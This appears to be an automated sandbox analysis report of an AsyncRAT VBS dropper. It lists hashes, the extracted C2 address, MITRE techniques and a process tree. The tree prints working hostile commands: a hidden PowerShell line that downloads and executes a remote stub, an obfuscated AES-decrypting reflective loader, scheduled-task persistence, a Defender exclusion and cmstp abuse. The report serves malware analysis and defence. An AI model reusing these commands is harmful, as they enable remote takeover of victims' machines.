asyncrat | bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b

Analysis

max time kernel
98s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03/12/2024, 18:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6400_output.vbs
Size

49KB
MD5

50e3a17992c509fd34daf21f3d408733
SHA1

99001c7b061914c9caaf7ef2ba75f25ac3498d82
SHA256

bb11c0b847be578c727bd146e232a82eb65b8c43ad1657b200e12416b5fb3e3b
SHA512

e21c89778aecaa7a532f5d953a87b6ed575a14788556b67b3311ffec188d492bd633773ee81879c1451cf6ed1ad4c189bf41f07fc8dbba72bd07103a53597849
SSDEEP

768:I+1zXj3HDb1sybJRpN9/NVAdEamHuaxBsgV29+DY9lYUP7bFQqrSwli:IIzTzL/vtNV/RHvM5ADeHFn0

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

38.255.42.40:1020

Mutex

ZOmahQBSRciB

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/4112-203-0x0000000005340000-0x0000000005352000-memory.dmp	family_asyncrat

Blocklisted process makes network request 2 IoCs

flow	pid	Process
8	2288	powershell.exe
38	4112	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1820	powershell.exe
1216	powershell.exe
2404	powershell.exe
2288	powershell.exe
3836	powershell.exe
4260	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4908	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2420	taskkill.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2288	powershell.exe
2288	powershell.exe
3836	powershell.exe
3836	powershell.exe
1644	powershell.exe
1644	powershell.exe
4260	powershell.exe
4260	powershell.exe
5028	powershell.exe
5028	powershell.exe
1820	powershell.exe
1820	powershell.exe
4112	powershell.exe
4112	powershell.exe
1216	powershell.exe
1216	powershell.exe
4308	powershell.exe
4308	powershell.exe
2404	powershell.exe
2404	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeIncreaseQuotaPrivilege	5028	powershell.exe
Token: SeSecurityPrivilege	5028	powershell.exe
Token: SeTakeOwnershipPrivilege	5028	powershell.exe
Token: SeLoadDriverPrivilege	5028	powershell.exe
Token: SeSystemProfilePrivilege	5028	powershell.exe
Token: SeSystemtimePrivilege	5028	powershell.exe
Token: SeProfSingleProcessPrivilege	5028	powershell.exe
Token: SeIncBasePriorityPrivilege	5028	powershell.exe
Token: SeCreatePagefilePrivilege	5028	powershell.exe
Token: SeBackupPrivilege	5028	powershell.exe
Token: SeRestorePrivilege	5028	powershell.exe
Token: SeShutdownPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeSystemEnvironmentPrivilege	5028	powershell.exe
Token: SeRemoteShutdownPrivilege	5028	powershell.exe
Token: SeUndockPrivilege	5028	powershell.exe
Token: SeManageVolumePrivilege	5028	powershell.exe
Token: 33	5028	powershell.exe
Token: 34	5028	powershell.exe
Token: 35	5028	powershell.exe
Token: 36	5028	powershell.exe
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeIncreaseQuotaPrivilege	1820	powershell.exe
Token: SeSecurityPrivilege	1820	powershell.exe
Token: SeTakeOwnershipPrivilege	1820	powershell.exe
Token: SeLoadDriverPrivilege	1820	powershell.exe
Token: SeSystemProfilePrivilege	1820	powershell.exe
Token: SeSystemtimePrivilege	1820	powershell.exe
Token: SeProfSingleProcessPrivilege	1820	powershell.exe
Token: SeIncBasePriorityPrivilege	1820	powershell.exe
Token: SeCreatePagefilePrivilege	1820	powershell.exe
Token: SeBackupPrivilege	1820	powershell.exe
Token: SeRestorePrivilege	1820	powershell.exe
Token: SeShutdownPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeSystemEnvironmentPrivilege	1820	powershell.exe
Token: SeRemoteShutdownPrivilege	1820	powershell.exe
Token: SeUndockPrivilege	1820	powershell.exe
Token: SeManageVolumePrivilege	1820	powershell.exe
Token: 33	1820	powershell.exe
Token: 34	1820	powershell.exe
Token: 35	1820	powershell.exe
Token: 36	1820	powershell.exe
Token: SeIncreaseQuotaPrivilege	1820	powershell.exe
Token: SeSecurityPrivilege	1820	powershell.exe
Token: SeTakeOwnershipPrivilege	1820	powershell.exe
Token: SeLoadDriverPrivilege	1820	powershell.exe
Token: SeSystemProfilePrivilege	1820	powershell.exe
Token: SeSystemtimePrivilege	1820	powershell.exe
Token: SeProfSingleProcessPrivilege	1820	powershell.exe
Token: SeIncBasePriorityPrivilege	1820	powershell.exe
Token: SeCreatePagefilePrivilege	1820	powershell.exe
Token: SeBackupPrivilege	1820	powershell.exe
Token: SeRestorePrivilege	1820	powershell.exe
Token: SeShutdownPrivilege	1820	powershell.exe
Token: SeDebugPrivilege	1820	powershell.exe
Token: SeSystemEnvironmentPrivilege	1820	powershell.exe
Token: SeRemoteShutdownPrivilege	1820	powershell.exe

Suspicious use of WriteProcessMemory 49 IoCs

description	pid	Process	procid_target
PID 4420 wrote to memory of 2288	4420	WScript.exe	83
PID 4420 wrote to memory of 2288	4420	WScript.exe	83
PID 2288 wrote to memory of 3608	2288	powershell.exe	86
PID 2288 wrote to memory of 3608	2288	powershell.exe	86
PID 3608 wrote to memory of 3520	3608	csc.exe	87
PID 3608 wrote to memory of 3520	3608	csc.exe	87
PID 2288 wrote to memory of 4296	2288	powershell.exe	88
PID 2288 wrote to memory of 4296	2288	powershell.exe	88
PID 4420 wrote to memory of 1984	4420	WScript.exe	108
PID 4420 wrote to memory of 1984	4420	WScript.exe	108
PID 1984 wrote to memory of 3084	1984	cmd.exe	110
PID 1984 wrote to memory of 3084	1984	cmd.exe	110
PID 3084 wrote to memory of 1524	3084	cmd.exe	112
PID 3084 wrote to memory of 1524	3084	cmd.exe	112
PID 3084 wrote to memory of 1644	3084	cmd.exe	113
PID 3084 wrote to memory of 1644	3084	cmd.exe	113
PID 3084 wrote to memory of 1644	3084	cmd.exe	113
PID 1644 wrote to memory of 4260	1644	powershell.exe	115
PID 1644 wrote to memory of 4260	1644	powershell.exe	115
PID 1644 wrote to memory of 4260	1644	powershell.exe	115
PID 1644 wrote to memory of 5028	1644	powershell.exe	116
PID 1644 wrote to memory of 5028	1644	powershell.exe	116
PID 1644 wrote to memory of 5028	1644	powershell.exe	116
PID 1644 wrote to memory of 1820	1644	powershell.exe	120
PID 1644 wrote to memory of 1820	1644	powershell.exe	120
PID 1644 wrote to memory of 1820	1644	powershell.exe	120
PID 1644 wrote to memory of 4824	1644	powershell.exe	122
PID 1644 wrote to memory of 4824	1644	powershell.exe	122
PID 1644 wrote to memory of 4824	1644	powershell.exe	122
PID 4824 wrote to memory of 3976	4824	cmd.exe	124
PID 4824 wrote to memory of 3976	4824	cmd.exe	124
PID 4824 wrote to memory of 3976	4824	cmd.exe	124
PID 3976 wrote to memory of 2624	3976	cmd.exe	126
PID 3976 wrote to memory of 2624	3976	cmd.exe	126
PID 3976 wrote to memory of 2624	3976	cmd.exe	126
PID 3976 wrote to memory of 4112	3976	cmd.exe	127
PID 3976 wrote to memory of 4112	3976	cmd.exe	127
PID 3976 wrote to memory of 4112	3976	cmd.exe	127
PID 4112 wrote to memory of 1216	4112	powershell.exe	128
PID 4112 wrote to memory of 1216	4112	powershell.exe	128
PID 4112 wrote to memory of 1216	4112	powershell.exe	128
PID 3084 wrote to memory of 4908	3084	cmd.exe	129
PID 3084 wrote to memory of 4908	3084	cmd.exe	129
PID 4112 wrote to memory of 4308	4112	powershell.exe	130
PID 4112 wrote to memory of 4308	4112	powershell.exe	130
PID 4112 wrote to memory of 4308	4112	powershell.exe	130
PID 4112 wrote to memory of 2404	4112	powershell.exe	132
PID 4112 wrote to memory of 2404	4112	powershell.exe	132
PID 4112 wrote to memory of 2404	4112	powershell.exe	132

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6400_output.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2288
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\msyeug4g\msyeug4g.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA38.tmp" "c:\Users\Admin\AppData\Local\Temp\msyeug4g\CSCDF94871CAEAA4DBCBBC7D5914D12372B.TMP"
      4⤵
      PID:3520
- - C:\windows\system32\cmstp.exe
    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\smtj3h1e.inf
    3⤵
    PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "
      4⤵
      PID:1524
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1644
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4260
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 90481' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network90481Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1820
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network90481Man.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4824
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network90481Man.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network90481Man.cmd';$UlQe='CrSJrjeaSJrjteSJrjDSJrjecSJrjrypSJrjtSJrjorSJrj'.Replace('SJrj', ''),'FrduLGoduLGmBduLGasduLGe64duLGSduLGtduLGrduLGinduLGgduLG'.Replace('duLG', ''),'SplWEtyitWEty'.Replace('WEty', ''),'TrPLLOaPLLOnPLLOsfPLLOorPLLOmFPLLOinaPLLOlPLLOBloPLLOckPLLO'.Replace('PLLO', ''),'IqAvznvqAvzokqAvzeqAvz'.Replace('qAvz', ''),'ElCRJaeCRJamCRJaeCRJantCRJaAtCRJa'.Replace('CRJa', ''),'CopoKbTyToKbTooKbT'.Replace('oKbT', ''),'CNvoBhaNvoBnNvoBgNvoBeENvoBxNvoBteNvoBnsiNvoBonNvoB'.Replace('NvoB', ''),'DVBxQecoVBxQmVBxQprVBxQeVBxQssVBxQ'.Replace('VBxQ', ''),'GFWFdetFWFdCuFWFdrFWFdreFWFdntFWFdPFWFdrocFWFdessFWFd'.Replace('FWFd', ''),'MaJpEGinJpEGMoJpEGdJpEGuJpEGleJpEG'.Replace('JpEG', ''),'ReaMYpLdMYpLLiMYpLneMYpLsMYpL'.Replace('MYpL', ''),'LoHeytadHeyt'.Replace('Heyt', ''),'EntGbxPrGbxPyGbxPPGbxPoiGbxPntGbxP'.Replace('GbxP', '');powershell -w hidden;function qnnlg($BQRjz){$vhoqP=[System.Security.Cryptography.Aes]::Create();$vhoqP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vhoqP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vhoqP.Key=[System.Convert]::($UlQe[1])('PqF8xJ4DsUvA734I68CUFeZUlzBwmh524HQ2zwVtwU0=');$vhoqP.IV=[System.Convert]::($UlQe[1])('ZAXbNfl672AbdKJrN/GTPw==');$txLMz=$vhoqP.($UlQe[0])();$WcLWs=$txLMz.($UlQe[3])($BQRjz,0,$BQRjz.Length);$txLMz.Dispose();$vhoqP.Dispose();$WcLWs;}function cedax($BQRjz){$surik=New-Object System.IO.MemoryStream(,$BQRjz);$atgID=New-Object System.IO.MemoryStream;$stzGr=New-Object System.IO.Compression.GZipStream($surik,[IO.Compression.CompressionMode]::($UlQe[8]));$stzGr.($UlQe[6])($atgID);$stzGr.Dispose();$surik.Dispose();$atgID.Dispose();$atgID.ToArray();}$UdUcO=[System.IO.File]::($UlQe[11])([Console]::Title);$lgana=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 5).Substring(2))));$RDaZu=cedax (qnnlg ([Convert]::($UlQe[1])([System.Linq.Enumerable]::($UlQe[5])($UdUcO, 6).Substring(2))));[System.Reflection.Assembly]::($UlQe[12])([byte[]]$RDaZu).($UlQe[13]).($UlQe[4])($null,$null);[System.Reflection.Assembly]::($UlQe[12])([byte[]]$lgana).($UlQe[13]).($UlQe[4])($null,$null); "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network90481Man')
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 90481' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network90481Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2404
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:4908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
938ffc2cba917b243d86b2cf76dcefb4

SHA1
234b53d91d075f16cc63c731eefdae278e2faad3

SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
21KB

MD5
6774f0288141a753673b80f22e6ae660

SHA1
c5e9bc1b97025409da18ea8daee36cb983b564ad

SHA256
6472eef28a58f47e96b21f4a0645bdf14ef32fefa2b6e92fb1e38477669cc339

SHA512
b7884b8f7af7df9b1f6a4e732f4cd92495d2cae1360cf3f99d7df07c00c34a3f26996a6f7434b6b251bea19204e49fbdb8b8e670cf5fd972062e3dac3a9316a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
71ea96345e24e01ba091c969ed1046d2

SHA1
ab007e2e9ed4811485e0b4247e20012f8cf33daf

SHA256
d0e88b4e866371dd2ebb78a5e9b9bb156b00e7c534178738b6584ccbcbead04b

SHA512
b61971b79e156e5565ab622b74a2d355d61697d030065af8f372a5602a613e7b5e3d0ff3f8cdc0d02a66fd3daaa576c266f564698e1d70bbad8c7d00e6635c61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
b5f03483717020c70fe77b62740af22f

SHA1
9991698e9d1d882f31c451a6aa5072fd75d3089a

SHA256
06f76592e88c694ab243c14a0bbd6a8a677012cd7fe540f32f05a52312848a9a

SHA512
a4735651a4d95a6d347cd6b56776805e2602741c8a82002b06a8afbb295df2aca6716bf5d51fa5ac53c71742f119b17c2b9a2eebc13daed76f123081118ece37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
08c3dd830af2dc1c564fcb15b0455df8

SHA1
06c566aac1f64eb33b71b8bf7fa15aeacfcb9803

SHA256
bdf65952423a9901e1b706d6cc3fe523be622c9988b38db298c99e0004e5e0fd

SHA512
66a320760665720ca0b4c4f371a3582b1a33b1ad92af28bad2c50aa898b14b0e2b2c847d53194c7fff53710c0a6cb1e78ea261a02a9c3603e5506b9a220a6ef5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf0eda50972f08c8b9d8c9cb5ce7d0c2

SHA1
2d8fb14d729b8afe30b4dd3d83d9dfa50afd5dab

SHA256
58507df56c947895b91930c001aa1e917c7bd33cf813ec203487735195c545e1

SHA512
4acafe573b1ef9063ef434e44f72ba3e69d8b39834c13a11fc3c240cacfae71e45634829e31c1669ce842e2f7de0b11a4076142bcd3f185d6db5c67bbd64c2fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESBA38.tmp

Filesize
1KB

MD5
2e6b2e6424153c97436e71b72c4e5901

SHA1
2accba82dd6b486f522eeb5d2ab8ba9f1a4f725f

SHA256
f163bfa922ad488851aadae7b2accfb91d45eae6435a5490e92afe751da6bd03

SHA512
7c1e9b67042b4fe216208002d8b49dbe73a929c168f71d659b76b39473ce7607896f469ec3c44d2b80cbedd2e1d4245e396520245a8930a083dbf8a3f663d4c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_axclmaik.cx5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\msyeug4g\msyeug4g.dll

Filesize
4KB

MD5
9635f8dc76c4be78ebf414591216d605

SHA1
ee74fd4b842706416b4ec507ee1a45cc8bd4a1ee

SHA256
f54f8d17a3d1f91e1b7c7c0908a2a0906758828b3cbd97138f1dfbac29fecba6

SHA512
a6bb2fe5193cf0ae76cf93da07cbe48eed81245ca714c33b653e7da1120b4d88f074c606fb682b2a726cc6e40ebd3eee22cb69297b4d4b688568345ea6cf851b

Download Submit
C:\Users\Admin\AppData\Local\Temp\n1.bat

Filesize
48KB

MD5
83fba8b8c150fdd949067fc54f597aa1

SHA1
fc6e442dba604453db6988950a09cd539c5f2ec8

SHA256
7f5beae0e19c0836c3f6838dacbebab8a8811643156f1af13664ff4725989f25

SHA512
11c852bb8d36a9e42beb5d42b3120bcec309ff751e60f750b8d35383b546285fd999450a13c238074228b8170d6efd16f238ec2c583964ee8393df23a201c1dd

Download Submit
C:\windows\temp\smtj3h1e.inf

Filesize
675B

MD5
0a85805c6649ad8e6f40c9ddc1258a49

SHA1
69ca8a686c49218281a09bbed22ef55654a04459

SHA256
f20428b0f70a5fa861f27eef9583b473217ee467ef39f475d337f073851436be

SHA512
16775646f1df49f479e967c885e9948c52fcd31abc2041c63a50fd32e1380d3d963612d02f2db62e39c3bdcc959eb2d56f40d9f0f82a36897c8340206e355fad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\msyeug4g\CSCDF94871CAEAA4DBCBBC7D5914D12372B.TMP

